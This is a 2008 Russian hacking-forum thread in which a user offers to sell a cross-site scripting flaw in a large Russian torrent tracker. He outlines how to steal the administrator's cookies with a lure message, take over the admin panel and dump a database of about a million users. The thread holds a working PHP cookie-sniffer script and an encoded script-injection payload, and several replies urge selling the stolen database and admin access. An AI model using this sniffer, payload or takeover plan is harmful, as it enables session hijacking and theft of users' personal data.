Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Разное - Покупка, продажа, обмен (https://forum.antichat.xyz/forumdisplay.php?f=52)
-   -   Xss в крупном Российском трекере (https://forum.antichat.xyz/showthread.php?t=77463)

geforse 17.07.2008 15:06

Xss в крупном Российском трекере
 
Пассивная XSS в крупнейшем Российском трекере (не торрентс)

За подробностями 643~770
---------------------------------------------------------------------------
Возможность слить БД (~1000000 пользователей) и получить доступ к Админ-Панели!

.Striker 17.07.2008 15:10

Возможность слить БД

как ты через xxs бд будешь сливать?)

geforse 17.07.2008 15:13

.Striker
Ну давай подумаем:

Код:

1. Получаем куки админа
2. Сразу идём в админку
3. Резервная копия БД
4. Начать копирование

Так более яснее ?

.Striker 17.07.2008 15:14

ты сначала получи куки и без палева слей её если получится :)
а потом отпиши

если сайт крупный, то думаю тама за всем пасут

geforse 17.07.2008 15:18

Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает"
Куки у меня и я админ!
-------------------------------------------------------------------

Сейчас снифер античатовский прост не работает))
У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки

Цитата:

Сообщение от .Striker
если сайт крупный, то думаю тама за всем пасут

XSS я обнаружил ~2 недели назад, ещё актуальна и закрывать повидимому не собираются

З.Ы. Плиз без флуда ( =

.Striker 17.07.2008 15:22

сниффер
<?php
$ip = getenv("REMOTE_ADDR");
$rhost = getenv("HTTP_REFERER");
$input = getenv("QUERY_STRING");
$date=(date("d.m.y"));
$time=(date("H:i"));
$fp = @fopen("snif.txt", "a");
@fputs($fp, "Дата: [ $date ] Время: [ $time ] IP: $ip Хост: $rhost Инфа $input \n");
@fclose($fp);
?>

De-visible 17.07.2008 15:24

Цитата:

Сообщение от geforse
Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает"
Куки у меня и я админ!
-------------------------------------------------------------------

Сейчас снифер античатовский прост не работает))
У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки



XSS я обнаружил ~2 недели назад, ещё актуальна и закрывать повидимому не собираются

З.Ы. Плиз без флуда ( =

Чем не устроил сниффер от GreenBear?

Kaimi 17.07.2008 15:27

Продавал бы тогда уж сразу бд

geforse 17.07.2008 15:31

Цитата:

Сообщение от De-visible
Чем не устроил сниффер от GreenBear?

Я его и имел ввиду (XSS тестировалась именно на нём) {он сейчас не работает(}

Цитата:

Сообщение от Kaimi
Продавал бы тогда уж сразу бд

Что-то не хочется мне торговать БД ( =
-----------------------------------------------

Все предложения по поводу XSS в ПМ или ICQ

geforse 17.07.2008 18:46

XSS в сообщении, выглядит так: http://ipicture.ru/uploads/080717/3WqCBZY7Lf.jpg

BlackSun 17.07.2008 18:48

Цитата:

в крупнейшем Российском трекере (не торрентс)
Ссыль на сам трекер трудно было выложить?

YoYo Factory 17.07.2008 18:50

geforse, если серьезно, то молодец, советую БД отдельно продать в одни руки, и админку в другие! ;)
и XSS в другие)))
всего 3 чела, а цена будет стоить своего!:)

YoYo Factory 17.07.2008 18:51

Цитата:

Сообщение от BlackSun
Ссыль на сам трекер трудно было выложить?

XSS могут найти и прикрыть! :D

BlackSun 17.07.2008 18:52

Сори чувак, но найти ее было очень просто ..

Код:

NjggNzQgNzQgNzAgM2EgMmYgMmYgNzQgNjYgNjkgNmMgNjUgMmUgNzIgNzUgMmYgMGQgMGEgYzIgZjEgZTUgZTMgZWUgMjAgZTcgZTAgZjAgZTUgZTMgZTggZjEgZjIgZjAgZTggZjAgZWUgZTIgZTAgZWQgZWQgZmIgZjUgMjAgZWYgZWUgZWIgZmMgZTcgZWUgZTIgZTAgZjIgZTUgZWIgZTUgZTkgM2EgMjAgNWIgNDIgNWQgMzEgMzIgMzAgMzAgMzggMzMgMzIgNWIgMmYgNDIgNWQgMGQgMGEgMGQgMGEgNjggNzQgNzQgNzAgM2EgMmYgMmYgNzQgNjYgNjkgNmMgNjUgMmUgNzIgNzUgMmYgNjYgNmYgNzIgNzUgNmQgMmYgNzMgNzMgNjUgNjEgNzIgNjMgNjggMmUgNzAgNjggNzAgM2YgNzEgM2QgMjIgM2UgM2MgNzMgNjMgNzIgNjkgNzAgNzQgM2UgNjEgNmMgNjUgNzIgNzQgMjggMjIgNDIgNmMgNjEgNjMgNmIgNTMgNzUgNmUgMjIgMjkgM2IgM2MgMmYgNzMgNjMgNzIgNjkgNzAgNzQgM2UgMjYgNjYgM2QgMzEgMzcgMjYgNjcgM2QgMjYgNzEgNmMgM2QgMzAgMjYgNjEgM2QgMjYgNjQgM2QgMjYgNjkgNmYgM2QgMzEgMjYgNmYgM2QgMjYgNjMgNzAgM2QgMzEgMjYgNzMgNmMgNzQgM2QgMzAgMjYgNzMgNjcgNzQgM2QgMzA=
кому надо, расшифруют

diznt 17.07.2008 18:55

BlackSun АХАХАХАХАХ ТРУ ХАКЕР)!)
ПРЯМ ОБЛОМЩЕК :D

NFM 17.07.2008 19:12

да уж =) щя все админа заспамят

geforse 17.07.2008 19:16

ОГРОМНОЕ СПАСИБО, ПОЛЬЗОВАТЕЛИ АЧЧАТА

ТОЛЬКО НАСТОЯЩИЕ КУЛХАЦКЕРЫ ТАК МОГЛИ ПОСТУПИТЬ....я всегда считал, что тут люди помогают друг другу, а НЕ ГАДЯТ....ещё раз всем спасибо

crackmail 17.07.2008 19:42

бугага)) ор

X-Venom 17.07.2008 19:55

Паццтолом!))

159932 17.07.2008 19:57

это жестоко - но так бывает ..

xcedz 17.07.2008 19:58

и чо?

int13h 17.07.2008 22:01

BlackSun, респект ;) Жаль в репутацию поставить не могу + :)

Chaak 17.07.2008 22:08

А за сколько продать хотел? Не растраивайся, продай акк админа!

.dimoN. 17.07.2008 22:59

надо было самому БД сливать...

Vid0k 17.07.2008 23:14

не расстраивайся
нашел одну найдешь и вторую и третью...
с одной стороны BlackSun молодец, красавец и тд и тп...
а с другой стороны ну ни хорошо так делать
моя точка зрения что BlackSun поступил не правельно

Petr 17.07.2008 23:43

Щяс с Админом Торрентс ру говорил, он первый с кем я в инете познакомился :)
Карочи говоря если ты даже сесию админа спиздиш бд у тебя не будет ;)

5triker 18.07.2008 00:40

^^

diehard 18.07.2008 01:26

Цитата:

Сообщение от geforse
ОГРОМНОЕ СПАСИБО, ПОЛЬЗОВАТЕЛИ АЧЧАТА

ТОЛЬКО НАСТОЯЩИЕ КУЛХАЦКЕРЫ ТАК МОГЛИ ПОСТУПИТЬ....я всегда считал, что тут люди помогают друг другу, а НЕ ГАДЯТ....ещё раз всем спасибо

ТС ты пытался впарить боян?
http://forum.antichat.ru/showpost.ph...postcount=1948

Nightmarе 18.07.2008 01:38

У него типа в ssearch.php

Nightmarе 18.07.2008 01:41

Тока там же пых-пых Б..Б..

Какая админка млин? без пароля админа. Это явное полоскание мозгов.

geforse 18.07.2008 10:05

Если получить куки админа, который только что побывал в админке, доступ в в админ панель гарантирован.
Просто письмо: Cмените мне ник, я вам дам 5wmz и админ в админке, а куки мои.

geforse 18.07.2008 10:10

Цитата:

Сообщение от diehard
ТС ты пытался впарить боян?
http://forum.antichat.ru/showpost.ph...postcount=1948

Там в index.php, у меня в другом...

tusman 18.07.2008 10:32

А не тут - http://tfile.ru/forum/ssearch.php случайно ? :)


Время: 10:43